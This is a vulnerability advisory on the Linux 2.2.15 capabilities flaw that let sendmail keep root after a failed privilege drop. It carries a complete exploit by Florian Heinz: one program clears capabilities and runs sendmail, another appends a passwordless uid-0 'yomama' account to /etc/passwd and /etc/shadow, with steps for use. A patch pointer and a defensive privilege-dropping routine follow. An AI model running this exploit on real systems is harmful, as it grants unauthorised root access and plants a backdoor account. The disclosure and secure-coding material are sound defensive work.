Linux Capabilities Vulnerability

Published: 2000-05-16
Updated: 2000-05-16
Severity: High
Threat: local administrator (root) privileges
Error type: design error
Exploit mode: server mode

Affected systems

Linux kernel 2.2.15

Detailed description

POSIX "Capabilities" were added to the Linux kernel as an additional form of privilege control that allows finer-grained control over what a privileged process is permitted to do. Capabilities consist of three bitfields, in which each bit stands for one specific privileged action that a process may perform; by setting or clearing these bits, individual privileged actions can be controlled. The problem is that the Capabilities are copied across fork() and exec(): if a parent process modifies its Capabilities, the child inherits them. This can be exploited by clearing all Capabilities (every bit OFF) and then executing a setuid program that drops its privileges, such as sendmail. When sendmail calls setuid()/seteuid() to drop its privileges while those bits are off, the call does not take effect, and sendmail does not check its return value. Sendmail therefore keeps running with superuser privileges and executes the user's .forward as root, which compromises the system.

Test code

Hello all,

Attached is a file with 2 sources, ex.c and add.c. Compile these 2 and create a file "mail":

From: yomama@foobar.com
To: localuser@localdomain.com
Subject: foo bar
.

then create a .forward with:

|/path/to/add

then just do:

./ex < mail

This should add a user yomama with uid/gid = 0 and without a password set; a simple su - yomama should give you root.

This exploit was written by me in a hurry, I hope there are no mistakes.

Greets
Florian Heinz

-- snip -- ex.c --
#include <stdlib.h>             /* malloc() */
#include <unistd.h>             /* execlp() */
#include <linux/capability.h>   /* cap_user_header_t, cap_user_data_t, _LINUX_CAPABILITY_VERSION */
#include <sys/capability.h>     /* capset() prototype (libcap) */

int main (void)
{
    cap_user_header_t header;
    cap_user_data_t data;

    header = malloc(8);
    data = malloc(12);
    header->pid = 0;                              /* 0 = the calling process */
    header->version = _LINUX_CAPABILITY_VERSION;
    /* clear every bit in all three capability sets */
    data->inheritable = data->effective = data->permitted = 0;
    capset(header, data);
    /* the cleared sets are inherited across exec by the setuid program */
    execlp("/usr/sbin/sendmail", "sendmail", "-t", NULL);
    return 0;
}
-- snap -- ex.c --

-- snip -- add.c --
#include <fcntl.h>     /* open(), O_APPEND, O_WRONLY */
#include <string.h>    /* strcpy(), strlen() */
#include <unistd.h>    /* seteuid(), write(), close() */

int main (void)
{
    int fd;
    char string[40];

    /* started from .forward by a sendmail that never actually dropped root */
    seteuid(0);
    fd = open("/etc/passwd", O_APPEND|O_WRONLY);
    strcpy(string, "yomama:x:0:0::/root:/bin/sh\n");
    write(fd, string, strlen(string));
    close(fd);
    fd = open("/etc/shadow", O_APPEND|O_WRONLY);
    strcpy(string, "yomama::11029:0:99999:7:::");
    write(fd, string, strlen(string));
    close(fd);
    return 0;
}
-- snap -- add.c --

Solution

Apply the Linux kernel version 2.2.16pre6 patch.

Related information
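The root cause on the application side is a privilege drop whose return value is never checked. The routine below is an added example, written for this entry; it is not code from the advisory, from Florian Heinz, or from sendmail. It shows how a setuid daemon should drop privileges so that the scenario above cannot occur: every setgid()/setuid() call is checked, the real, effective and saved ids are read back, and, when leaving root, the process proves that root can no longer be regained. The function name drop_privileges and the main() that drops to the invoking user's own ids are assumptions made for the demonstration; the program runs unprivileged as well as as root.

```c
#define _GNU_SOURCE           /* getresuid()/getresgid() on glibc */
#include <errno.h>
#include <grp.h>              /* setgroups() */
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Permanently drop to uid/gid, checking every call and then verifying the
 * result.  When a root process has had CAP_SETUID/CAP_SETGID stripped from its
 * permitted set (the capability-clearing trick the advisory describes),
 * setuid()/setgid() fail with EPERM; a caller that ignores that failure keeps
 * running as root.  Returns 0 on success, -1 on any failure with errno set. */
int drop_privileges(uid_t uid, gid_t gid)
{
    uid_t ruid, euid, suid;
    gid_t rgid, egid, sgid;

    /* 1. Supplementary groups first: only possible while still privileged.
     *    setgroups() itself needs CAP_SETGID, so its failure is already a sign
     *    that the capability sets are not what a root process expects. */
    if (geteuid() == 0 && setgroups(0, NULL) != 0)
        return -1;

    /* 2. Group before user: once the uid is gone, setgid() is no longer allowed. */
    if (setgid(gid) != 0)
        return -1;
    if (setuid(uid) != 0)
        return -1;

    /* 3. Do not trust the return values alone: read back real, effective and
     *    saved ids so that a partial drop (saved id still 0) is caught too. */
    if (getresuid(&ruid, &euid, &suid) != 0 || getresgid(&rgid, &egid, &sgid) != 0)
        return -1;
    if (ruid != uid || euid != uid || suid != uid ||
        rgid != gid || egid != gid || sgid != gid) {
        errno = EPERM;
        return -1;
    }

    /* 4. When dropping away from root, prove that root cannot be regained. */
    if (uid != 0 && seteuid(0) == 0) {
        errno = EPERM;
        return -1;
    }

    return 0;
}

int main(void)
{
    /* Constructed demonstration: drop to the caller's own ids, which succeeds
     * for an unprivileged user as well and exercises every check above. */
    if (drop_privileges(getuid(), getgid()) != 0) {
        perror("drop_privileges");
        return 1;
    }
    printf("running as uid %u gid %u; root cannot be regained\n",
           (unsigned)getuid(), (unsigned)getgid());
    return 0;
}
```

The order matters: supplementary groups, then the gid, then the uid, because each step removes the privilege needed for the next one. The read-back in step 3 is what would have caught the sendmail case, since after a failed setuid() the effective uid is still 0 regardless of what the program believes.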